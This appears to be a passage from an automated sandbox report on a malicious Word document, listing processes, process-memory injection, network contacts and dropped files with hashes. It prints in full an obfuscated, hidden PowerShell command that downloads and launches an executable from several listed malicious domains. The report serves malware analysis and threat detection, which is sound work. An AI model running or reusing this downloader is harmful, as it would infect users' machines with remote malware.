| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5024 wrote to memory of 2212 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 5024 wrote to memory of 2212 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71dc7b3ec20fe14ce87e29bb46815dd2ba908ca055dd70b5ae9c89cb7cd3030a.doc" /o ""
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABHAGsAYgBlAGkAbgBoAG4AZAB4AD0AJwBKAHMAawB0AHoAYgBxAGgAdgBpAHIAaQAnADsAJABHAHIAegBoAHAAaQBsAGMAeQAgAD0AIAAnADUAMAA2ACcAOwAkAFYAZQBnAGsAcAB2AGgAbABjAGUAbwBiAD0AJwBIAHcAaAB5AHcAcQBvAGYAcABtACcAOwAkAE4AbgBkAHMAcgBuAGcAcwBrAHAAdAB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAHIAegBoAHAAaQBsAGMAeQArACcALgBlAHgAZQAnADsAJABCAHAAeQBzAHMAcgB4AHQAbAA9ACcATQBzAHoAYwBoAGgAbwBsAHoAbwB2AG8AbAAnADsAJABFAG8AZgBpAGMAbwBnAHEAaQA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQAUwBhAHcAawB2AHkAYwBrAHgAegBzAD0AJwBoAHQAdABwADoALwAvAHQAcgBlAG4AZABpAG4AZgBvAHIAbQBhAHQAaQBjAGEALgBlAHUALwBhAHIAYwBmAGEAYgByAGkAYwBzAC8AaQA4ADgAaQB4AHkAOQAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBvAG0AZQBsAGUAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAUQBkAC8AKgBoAHQAdABwADoALwAvAGsAZwBkADgAOQA4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADQANQBtAGkALwAqAGgAdAB0AHAAOgAvAC8AaQBkAGUAYQBsAHMAcwBzAGMAaABhAG4AZwAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ANgAwAFAAYwBCAC8AKgBoAHQAdABwADoALwAvAGgAYQBwAHAAaQBuAGUAcwBzADMANgAwAGQAZQBnAHIAZQBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBmAGoALwAnAC4AIgBzAHAATABgAEkAVAAiACgAJwAqACcAKQA7ACQAUQB2AGYAcABwAHUAagBoAHQAcgA9ACcATAB4AGUAagBhAHgAegB1AGcAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBxAGkAdwBvAGUAbABiAGwAIABpAG4AIAAkAFMAYQB3AGsAdgB5AGMAawB4AHoAcwApAHsAdAByAHkAewAkAEUAbwBmAGkAYwBvAGcAcQBpAC4AIgBEAGAAbwBgAHcAbgBMAE8AQQBEAEYASQBgAEwAZQAiACgAJABBAHEAaQB3AG8AZQBsAGIAbAAsACAAJABOAG4AZABzAHIAbgBnAHMAawBwAHQAdQApADsAJABZAGEAYQBiAHQAZwBhAG0AaQA9ACcAQwBuAHYAdQBjAGMAawBnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQAuACIATABgAGUATgBHAFQASAAiACAALQBnAGUAIAAyADgANQAzADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQA7ACQAQwBvAHYAZgB1AHEAbQBwAGMAdQBoAHgAcgA9ACcASQBvAG4AcQBhAGIAYwB3AGIAdgBlAGQAJwA7AGIAcgBlAGEAawA7ACQAVwBwAGMAbgBiAHkAbQBmAG8AbABrAGEAPQAnAEYAdQBxAGUAZgBpAHUAdgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAegByAHQAagBxAG0AcAB4AGcAZQBmAD0AJwBRAGgAYwBhAGIAZwBhAGgAdwBxAGgAJwA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 68.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trendinformatica.eu | udp |
| DE | 78.46.177.194:80 | trendinformatica.eu | tcp |
| US | 8.8.8.8:53 | theomelet.com | udp |
| US | 66.115.171.70:80 | theomelet.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.177.46.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kgd898.com | udp |
| US | 8.8.8.8:53 | idealssschang.com | udp |
| US | 8.8.8.8:53 | 70.171.115.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | happiness360degree.com | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| US | 95.100.195.11:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 11.195.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.252.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
Files
memory/5024-0-0x00007FF8C6790000-0x00007FF8C67A0000-memory.dmp
memory/5024-3-0x00007FF9067AD000-0x00007FF9067AE000-memory.dmp
memory/5024-2-0x00007FF8C6790000-0x00007FF8C67A0000-memory.dmp
memory/5024-1-0x00007FF8C6790000-0x00007FF8C67A0000-memory.dmp
memory/5024-5-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-4-0x00007FF8C6790000-0x00007FF8C67A0000-memory.dmp
memory/5024-10-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-11-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-13-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-12-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-14-0x00007FF8C4290000-0x00007FF8C42A0000-memory.dmp
memory/5024-9-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-8-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-7-0x00007FF8C6790000-0x00007FF8C67A0000-memory.dmp
memory/5024-6-0x00007FF906710000-0x00007FF906905000-memory.dmp
memory/5024-15-0x00007FF8C4290000-0x00007FF8C42A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\48A8D199.wmf
| MD5 | cf7026f252831f9598b5fd050ee683e4 |
| SHA1 | 290c19f9d6cfcf316d012fdb555e856082025fee |
| SHA256 | 531475e2ce1b586b7967d8f1aac430a4e0e03dc1833f2463b1dfb607f22e0159 |
| SHA512 | 55c646ebaf5f642295605ca9b2750ca0a21b3c3f006d79d14daf99961ce9d16adffe137f87e8eeff9eb03515b147d0241349af7aedf03737026eb7ac4745157d |
memory/1492-66-0x000001CB079E0000-0x000001CB07A02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ky3sigqj.d0k.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5024-73-0x00007FF906710000-0x00007FF906905000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 41660977a4c6cbe34581f5142a2c833f |
| SHA1 | 061bf9c261551e9777765c701a00a191f8513468 |
| SHA256 | 43c928dc53cd58cb9f115994f1c02a9a218c57523d2100fe7b9964e70e385468 |
| SHA512 | 46504dc8cfffceb6082f152d4507e97ca6fa6b9ad1ed2f91bb7ad09bd90b11891f0cf00d029627af25fb5a30c28c394e5ad82efd543d4f1e074e2640aadd0822 |
C:\Users\Admin\AppData\Local\Temp\TCDF0BE.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |